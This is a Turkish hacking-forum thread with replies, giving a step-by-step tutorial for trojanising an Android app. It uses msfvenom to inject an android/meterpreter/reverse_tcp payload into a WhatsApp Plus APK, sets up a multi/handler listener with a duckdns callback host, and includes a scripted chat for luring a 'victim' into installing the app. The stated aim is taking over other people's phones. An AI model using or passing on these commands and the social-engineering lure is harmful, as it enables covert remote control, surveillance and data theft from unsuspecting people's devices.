Android | Meterpreter Backdoor Birleştirme

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

bengaripadam

Katılımcı Üye
3 Tem 2016
629
1
K.Maraş
Android | Meterpreter APK Backdoor Birleştirme

Merhabalar THT Ailesi, bu konumda sizlere met@sploit yardımı ile Android tabanlı cep telefonlarını ele geçirmeniz için güzel bir yöntem paylaşacağım. Yöntemi paylaşmam için "üşengeçliği bırak" diyen "ChyNova" hocamıza teşekkür etmeniz yeterlidir. Bu konuyu onun üşengeçliği bırak dediği için paylaşıyorum :) Aynı zamanda içerisinde bulunmuş olduğum "Stajyer Asistan Kulübü" gereğince insanlığa faydalı şeyler öğretmek adına elimden geldiğince sizlere hack vs. konularında yardım edeceğim.

Öncelikle; Meterpreter Backdoor Birleştirme Nedir?

Konuyu daha iyi anlamanız yaptığımız adımların ne işe yaradığını daha iyi ve daha kolay kavrayabilmeniz açısından konuya başlamadan önce birazcık bahsetmek istiyorum. Bu kısmı okumanızda gerçekten fayda var.

Backdoor Birleştirme dediğim olay şudur, normalde oluşturduğunuz Backdoor.apk dosyasını kurbana yedirirken kullandığınız SM yöntemi birazcık kuvvetli olması gerektiğini düşünüyorum. Çünkü kimse kolay kolay telefonuna "MainActivity" tarzında bir program yüklemez. Şahsen kendim yüklemem :)

E bu konuda ne yapabiliriz diyorsanız tam olarak ne yapmanız gerektiğini anlatacağım :)

Ben kendi kullandığım SM yöntemi ile devam edeceğim, Sizde bunu kullanabilirsiniz gayet işe yaramaktadır. :)

Whatsapp Plus programını hepiniz biliyorsunuzdur. Görünmezlik modları vs. gibi ilginç şeyler bulunmakta.

Öncelikle kendiniz normal Whatsapp Plus ile Plus eklentileri açıp yazın, konuşma şu şekilde olabilir;

Kod:
+Whatsapp Plus diye bir şey yükledim çok iyi
- Ne işe yarıyor?
+ Çevrim içi olduğunu kimse görmüyor felan, "yazıyor..." ifadesini kaldırıyosun gibi özellikleri var
- iyimiş :D
+ Apksı var bende sana da atayım bak bi :D Multi hesapta açabiliyorsun.

Tabi kurbanımız doğal olarak apk'sını sizden isteyecektir. Öncelikle programın havasını güzelce atabilirsiniz bu SM yönteminde :)

Whatsapp Plus programını buradan indirebilirsiniz; https://www.official-plus.com/dawnload-whatsapp-plus

Evet şimdi konumuz asıl olarak burada başlıyor. Şimdiye kadar sadece bu yöntemi nasıl yedirebileceğiniz hakkında ufak bilgiler verdim size :)

Kurbana göndereceğimiz Whatsapp Plus APK'sına "BACKDOOR" enjekte edelim.

Herhangi Bir APK Dosyasına Backdoor Enjekte Etme

Öncelikle ihtiyacımız olan şeyler;
1-) Enjekte Edilecek APK Dosyası ( Konuya Göre Whatsapp Plus olarak devam ediyorum )
2-) Kali Linux ( veya eklentileri sorunsuzca kullanabildiğiniz bir Debian/Ubuntu OS )

Eğer Her şey sorunsuzca ilerliyorsa artık başlayabiliriz :) Haydi Bismillâh!

ADIM 1: GEREKLİ MODÜLLERİ YÜKLEME

Öncelikle APK Dosyasına BACKDOOR'u Sorunsuzca ejekte edebilmek için birkaç modüle ihtiyacımız var.

1. Modül "zipalign"

Kod:
apt-get install zipalign
veya
sudo apt-get install zipalign

yukarıdaki komutlardan birisi ile zipalign modülünü Kali Linux'a yüklemeniz gerekmekte. Eğer Sources.List dosyanızda modülü bulamıyorsa Google'da ufak bir araştırma yaparak bu sorunun üstesinden nasıl gelebileceğinizi öğrenebilirsiniz. Yapamadığınız her sorunda mesaj atabilirsiniz.

nWBpBa.png


Modül bende zaten yüklü olduğu için Kali yüklemeyi tekrardan yapmadı. Burada dikkat etmeniz gereken noktalar modülün yüklenip yüklenmediğinden kesinlikle emin olmak.

2. Modül "apktool"

Kod:
apt-get install apktool
veya
sudo apt-get install apktool

yukarıdaki komutlardan birisi ile apktool modülünü Kali Linux'a yüklemeniz gerekmekte. Eğer Sources.List dosyanızda modülü bulamıyorsa Google'da ufak bir araştırma yaparak bu sorunun üstesinden nasıl gelebileceğinizi öğrenebilirsiniz. Yapamadığınız her sorunda mesaj atabilirsiniz.

nWBpna.png


Modül bende zaten yüklü olduğu için Kali yüklemeyi tekrardan yapmadı. Burada dikkat etmeniz gereken noktalar modülün yüklenip yüklenmediğinden kesinlikle emin olmak.

ADIM 2: APK DOSYASINA BACKDOOR ENJEKTE ETMEK

Modüllerimiz sorunsuzca yüklendiyse şayet APK dosyamıza BACKDOOR'u enjekte etmeye başlayabiliriz.

Kod:
msfvenom -x "apkdosyası" -p android/meterpreter/reverse_tcp LHOST=hostadresiniz LPORT=portunuz -o yeniapkdosyaadınız.apk

AkpNop.png


Yukarda kodunu ve resimde tam olarak nasıl kullanacağınızı gösterdim. Bilgileri kendi bilgileriniz ile değiştirdikten sonra enter'a basıp enjekte işlemini başlatabiliriz.

7N4Z85.png


Resimde görmüş olduğunuz gibi "msfvenom" modülümüz Whatsapp+.apk dosyasına yeni izinler ve payload'ı enjekte etti. :)

Ve yeni APKmız belirttiğimiz isimde oluştu :) Hayırlı Olsun :)

YNARjZ.png


Yukardaki resimdeki gibi artık Backdoor enjekte edilmiş APK dosyasını artık kurbana göndermeye hazırsınız !

Ama acele etmeyin tabi, ne demişler acele işe şeytan karışır. Öncelikle "met@sploit" üzerinden backdoorumuzu dinlemeye alalım :)

ADIM 3: MET@SPLOİT ÜZERİNDEN BACKDOOR DİNLEMEYE ALMA

Met@sploit'i açmak için terminal penceremize "msfconsole" komutunu yazalım ve enter'a basalım.

29b4g2.png


Met@sploit açılana kadar bekleyelim....

1gX0kN.png


Met@sploit açıldığına göre exploitimizi seçelim;

resimde de gördüğünüz gibi

Kod:
use exploit/multi/handler

komutu ile exploitimizi seçip enter'a basalım.

ok1l9X.png


Exploitimiz seçili hale geldikten sonra "set payload" komutu ile payloadımızı belirleyelim.

tam olarak yazmanız gereken kod şudur;
Kod:
set payload android/meterpreter/reverse_tcp

Yaparak payloadımızı seçelim..

gWBRVN.png


payload'ımız seçildikten sonra konsolda;

Kod:
show options

komutunu kullanarak ayarlara bakalım.

LHOST ve LPORT'umuzu ayarlamamız gerekiyor..

Kod:
set LHOST zekr1d.duckdns.org
set LPORT 4444
siz kendi port ve hostunuzu yazın

komutları ile APK oluştururken girdiğimiz host ve port'u değiştiriyoruz.

vpq75r.png


LHOST ve LPORT'u değiştirdik ve ne olur ne olmaz diye show options ile tekrardan baktık. ve evet sorun yok :) artık portumuzu dinlemeye başlayabiliriz.

0BQAyR.png


Kod:
exploit

komutu ile portumuzu dinlemeye başladık.

Artık Backdoor enjekte edilmiş apk dosyamızı kurbanımıza gönderebiliriz. :)

Kurbanımız apk'yı yükleyip açtığı an "meterpreter" oturumu açıcaksınız.

Hepinize Kolay Gelsin Arkadaşlar. Bir Sonraki Konumda Görüşürüz :)

Önemli Not: Resimde benim komutların sonlarında "\r" gibi bir ek var. komutları girerken siz öyle şeyler eklemeyin. bende kendi kendine ekliyor çözemedim onu da :)

bengaripadam | THT
alıntı değildir...
 
Moderatör tarafında düzenlendi:

emr3q

Üye
29 Tem 2017
148
19
Ellerine Sağlık Ama Zaten MSFVENOM İle .apk Uzantılı Backdoor'lar Üretebilirsin.
 

Hacking474

Üye
14 Mar 2017
230
0
Elinize sağlık ama tek sorun WhatsApp ın orjinal apk'sinde ve facebook orjinal uygulamasında hata verir. Bu hataların çözümü maalesef yok birçok backdoor yapmaya çalıştım bu yöntemler onlar dışında diğer apk dosyalarında yarayabilir. Tekrardan eline sağlık
 

bengaripadam

Katılımcı Üye
3 Tem 2016
629
1
K.Maraş
Ellerine Sağlık Ama Zaten MSFVENOM İle .apk Uzantılı Backdoor'lar Üretebilirsin.

msfvenom ile apk üretebiliriz evet ama ürettiğimiz apk "MainActivity" gibi bir isimle olmuş olur bunu kurbana yedirmek zor olabilir, benim anlattğım yöntem bir apk dosyasına enjekte etmek bu bir oyun olabilir bi uygulama olabilir fark etmez. bu şekilde kurbana yedirmek daha kolay olur :)

Elinize sağlık ama tek sorun WhatsApp ın orjinal apk'sinde ve facebook orjinal uygulamasında hata verir. Bu hataların çözümü maalesef yok birçok backdoor yapmaya çalıştım bu yöntemler onlar dışında diğer apk dosyalarında yarayabilir. Tekrardan eline sağlık

merhabalar hocam. orjinal whatsapp facebook apklarında denemedim hiç, zaten orjinal facebook ve whatsapp'ı kim Google Play dışından yüklüyor ki? ben yükleyen tanımadım hiç :D olmaması pekte önemli değil bence :D bu şekilde ihtiyaç gören uygulamalara yüklenmesi iyi en azından. fakat sizin için orjinal facebook ve whatsapp dosyalarına enjekte işlemini de araştıracağım. sonuçta apk dosyasını açıp tekrar imzalayarak birleştirme işlemi yapılıyor. android manifest dosyaları genelde tüm apk dosyalarında gizlidir. denemedim ama belki facebook veya whatsapp daha farklı yapmıştır ama o zaman whatsapp plus uygulaması nasıl geliştirildi diye düşünüyor insan? whatsapp kodları çalınamıyor olsaydı whatsapp plus olmazdı bence :) bi düşünelim bu konuyu. orjinal apklarda yaptığım işlemlerde sizi bilgilendireceğim.

Eline sağlık deniyorum hemen

rica ederim hocam inşallah işinize yarar :)
 
Son düzenleme:

CyberNeeG

Uzman üye
4 Ocak 2016
1,155
1
777
Lhost'unuzu ip adresiniz olarak girerseniz sadece aynı ağda çalışır arkadaşlar o yüzden duckdns kullanın.Eline sağlık dostum bunu demeyi unutmuşsun sanırım :).
 
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.